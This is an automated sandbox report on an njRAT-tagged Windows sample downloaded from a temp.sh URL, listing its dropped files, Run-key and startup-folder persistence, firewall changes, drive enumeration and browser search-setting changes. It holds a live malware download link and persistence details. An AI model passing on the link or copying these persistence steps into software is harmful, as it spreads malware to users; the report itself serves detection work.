Malware Analysis Report

2024-10-23 20:50

Sample ID 240623-1sa8eateng
Target https://temp.sh/WwJqO/vmware.exe
Tags: njrat windowsdefender discovery evasion persistence privilege_escalation spyware stealer trojan
Score: 10/10

Analysis Overview

Score: 10/10

Threat Level: Known bad

The file https://temp.sh/WwJqO/vmware.exe was found to be: Known bad.

Malicious Activity Summary

njrat windowsdefender discovery evasion persistence privilege_escalation spyware stealer trojan

njRAT/Bladabindi

Modifies Windows Firewall

Downloads MZ/PE file

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Modifies file permissions

Loads dropped DLL

Drops startup file

Looks up external IP address via web service

Checks installed software on the system

Enumerates connected drives

Adds Run key to start application

Blocklisted process makes network request

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Runs ping.exe

Enumerates system info in registry

Modifies Internet Explorer start page

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies system certificate store

Modifies Internet Explorer Phishing Filter

Uses Volume Shadow Copy WMI provider

Modifies registry class

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-23 21:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-23 21:54

Reported

2024-06-23 21:57

Platform

win7-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

Signatures

njRAT/Bladabindi

trojan njrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9300538b8eb52046b545ea0eefc265d2.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9300538b8eb52046b545ea0eefc265d2.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7A211A2D-C79F-453E-9139-561FAC3D7E45\lite_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yb2B26.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
N/A N/A C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\9300538b8eb52046b545ea0eefc265d2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\chrome_protect.exe\" .." C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\9300538b8eb52046b545ea0eefc265d2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\chrome_protect.exe\" .." C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\YandexBrowserAutoLaunch_45886AE68CD319C7351FF54A1DBD4B87 = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --shutdown-if-not-closed-by-system-restart" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Yandex\ui C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe N/A
File opened for modification C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe N/A
File opened for modification C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\debug.log C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIE8FD.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76bc31.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE59D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE33C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE68B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\System update for Yandex Browser.job C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
File opened for modification C:\Windows\Installer\MSIE202.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE30C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE63C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE7E4.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Update for Yandex Browser.job C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
File created C:\Windows\Tasks\Repairing Yandex Browser update service.job C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
File opened for modification C:\Windows\Installer\f76bc2e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE5ED.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE92D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76bc31.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Обновление Браузера Яндекс.job C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
File created C:\Windows\Installer\f76bc2e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE5CD.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 80131804b8c5da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Яндекс" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "https://yandex.ru/search/?win=651&clid=6035498-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\DisplayName = "Bing" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MINIE\LinksBandEnabled = "1" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30e44514b8c5da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\SuggestionsURL C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\NTTopResultURL C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IE11TR" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
